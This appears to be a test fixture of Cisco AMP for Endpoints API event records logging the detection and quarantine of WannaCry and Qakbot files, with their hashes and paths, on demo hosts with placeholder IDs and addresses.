process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
